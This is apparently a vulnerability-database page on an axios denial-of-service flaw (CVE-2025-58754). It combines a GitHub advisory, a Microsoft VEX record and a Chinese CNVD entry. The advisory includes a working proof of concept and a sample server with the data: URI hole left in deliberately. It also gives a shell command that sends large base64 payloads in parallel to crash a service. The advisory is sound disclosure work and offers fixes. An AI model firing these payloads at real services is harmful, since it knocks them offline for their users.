[`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n ...\n if (protocol === \u0027data\u0027) {\n uri = protocol.length ? uri.slice(protocol.length + 1) : uri;\n const match = DATA_URL_PATTERN.exec(uri);\n ...\n const body = match[3];\n const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? \u0027base64\u0027 : \u0027utf8\u0027);\n if (asBlob) { return new _Blob([buffer], {type: mime}); }\n return buffer;\n }\n throw new AxiosError(\u0027Unsupported protocol \u0027 + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require(\u0027axios\u0027);\n\nasync function main() {\n // this example decodes ~120 MB\n const base64Size = 160_000_000; // 120 MB after decoding\n const base64 = \u0027A\u0027.repeat(base64Size);\n const uri = \u0027data:application/octet-stream;base64,\u0027 + base64;\n\n console.log(\u0027Generating URI with base64 length:\u0027, base64.length);\n const response = await axios.get(uri, {\n responseType: \u0027arraybuffer\u0027\n });\n\n console.log(\u0027Received bytes:\u0027, response.data.length);\n}\n\nmain().catch(err =\u003e {\n console.error(\u0027Error:\u0027, err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n\u003c--- Last few GCs ---\u003e\n\u2026\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x\u2026 node::Abort() \u2026\n\u2026\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n timeout: 10000,\n maxRedirects: 5,\n httpAgent, httpsAgent,\n headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n validateStatus: c =\u003e c \u003e= 200 \u0026\u0026 c \u003c 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=\u003eres.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"\u003chttp|https|data URL\u003e\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) =\u003e {\n const url = req.body?.url;\n if (!url) return res.status(400).json({ error: \"missing url\" });\n\n let u;\n try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n // Developer allows using data:// in the allowlist\n const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n const controller = new AbortController();\n const onClose = () =\u003e controller.abort();\n res.on(\"close\", onClose);\n\n const before = process.memoryUsage().heapUsed;\n\n try {\n const r = await axiosClient.get(u.toString(), {\n responseType: \"stream\",\n maxContentLength: 8 * 1024, // Axios will ignore this for data:\n maxBodyLength: 8 * 1024, // Axios will ignore this for data:\n signal: controller.signal\n });\n\n // stream only the first 64KB back\n const cap = 64 * 1024;\n let sent = 0;\n const limiter = new PassThrough();\n r.data.on(\"data\", (chunk) =\u003e {\n if (sent + chunk.length \u003e cap) { limiter.end(); r.data.destroy(); }\n else { sent += chunk.length; limiter.write(chunk); }\n });\n r.data.on(\"end\", () =\u003e limiter.end());\n r.data.on(\"error\", (e) =\u003e limiter.destroy(e));\n\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n limiter.pipe(res);\n } catch (err) {\n const after = process.memoryUsage().heapUsed;\n res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n res.status(502).json({ error: String(err?.message || err) });\n } finally {\n res.off(\"close\", onClose);\n }\n});\n\napp.listen(PORT, () =\u003e {\n console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e \u0027const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))\u0027 \\\n| tee payload.json \u003e/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H \u0027Content-Type: application/json\u0027 --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n For `protocol === \u0027data:\u0027`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. **Stream decoding**\n Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.",
"id": "GHSA-4hjh-wcwx-xvwj",
"modified": "2025-09-29T19:03:57Z",
"published": "2025-09-11T21:07:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/7034"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v0.30.2"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Axios is vulnerable to DoS attack through lack of data size check"
}
msrc_cve-2025-58754
Vulnerability from csaf_microsoft
Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58754 Axios is vulnerable to DoS attack through lack of data size check - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-58754.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Axios is vulnerable to DoS attack through lack of data size check",
"tracking": {
"current_release_date": "2025-09-16T01:02:01.000Z",
"generator": {
"date": "2025-10-20T03:48:57.169Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-58754",
"initial_release_date": "2025-09-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-16T01:02:01.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"category": "product_name",
"name": "azl3 python-tensorboard 2.16.2-6",
"product": {
"name": "azl3 python-tensorboard 2.16.2-6",
"product_id": "1"
}
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-tensorboard 2.16.2-6 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"flags": [
{
"label": "component_not_present",
"product_ids": [
"17084-1"
]
}
],
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"known_not_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58754 Axios is vulnerable to DoS attack through lack of data size check - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-58754.json"
}
],
"title": "Axios is vulnerable to DoS attack through lack of data size check"
}
]
}
cnvd-2025-21410
Vulnerability from cnvd
厂商已发布了漏洞修复程序,请及时关注更新: https://github.com/axios/axios/releases/tag/v1.12.2
| Name | Axios Axios <1.11.0 |
|---|
{
"cves": {
"cve": {
"cveNumber": "CVE-2025-58754",
"cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
}
},
"description": "Axios\u662fAxios\u5f00\u6e90\u7684\u4e00\u6b3e\u57fa\u4e8ePromise\uff08\u5f02\u6b65\u7f16\u7a0b\u7684\u4e00\u79cd\u89e3\u51b3\u65b9\u6848\uff09\u7684HTTP\u5ba2\u6237\u7aef\u3002\n\nAxios 1.11.0\u4e4b\u524d\u7248\u672c\u5b58\u5728\u8d44\u6e90\u7ba1\u7406\u9519\u8bef\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u5904\u7406data\u65b9\u6848URL\u65f6\u672a\u9650\u5236\u5185\u5b58\u5206\u914d\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002",
"formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://github.com/axios/axios/releases/tag/v1.12.2",
"isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
"number": "CNVD-2025-21410",
"openTime": "2025-09-17",
"patchDescription": "Axios\u662fAxios\u5f00\u6e90\u7684\u4e00\u6b3e\u57fa\u4e8ePromise\uff08\u5f02\u6b65\u7f16\u7a0b\u7684\u4e00\u79cd\u89e3\u51b3\u65b9\u6848\uff09\u7684HTTP\u5ba2\u6237\u7aef\u3002\r\n\r\nAxios 1.11.0\u4e4b\u524d\u7248\u672c\u5b58\u5728\u8d44\u6e90\u7ba1\u7406\u9519\u8bef\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u5904\u7406data\u65b9\u6848URL\u65f6\u672a\u9650\u5236\u5185\u5b58\u5206\u914d\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
"patchName": "Axios\u8d44\u6e90\u7ba1\u7406\u9519\u8bef\u6f0f\u6d1e\u7684\u8865\u4e01",
"products": {
"product": "Axios Axios \u003c1.11.0"
},
"referenceLink": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"serverity": "\u9ad8",
"submitTime": "2025-09-16",
"title": "Axios\u8d44\u6e90\u7ba1\u7406\u9519\u8bef\u6f0f\u6d1e"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.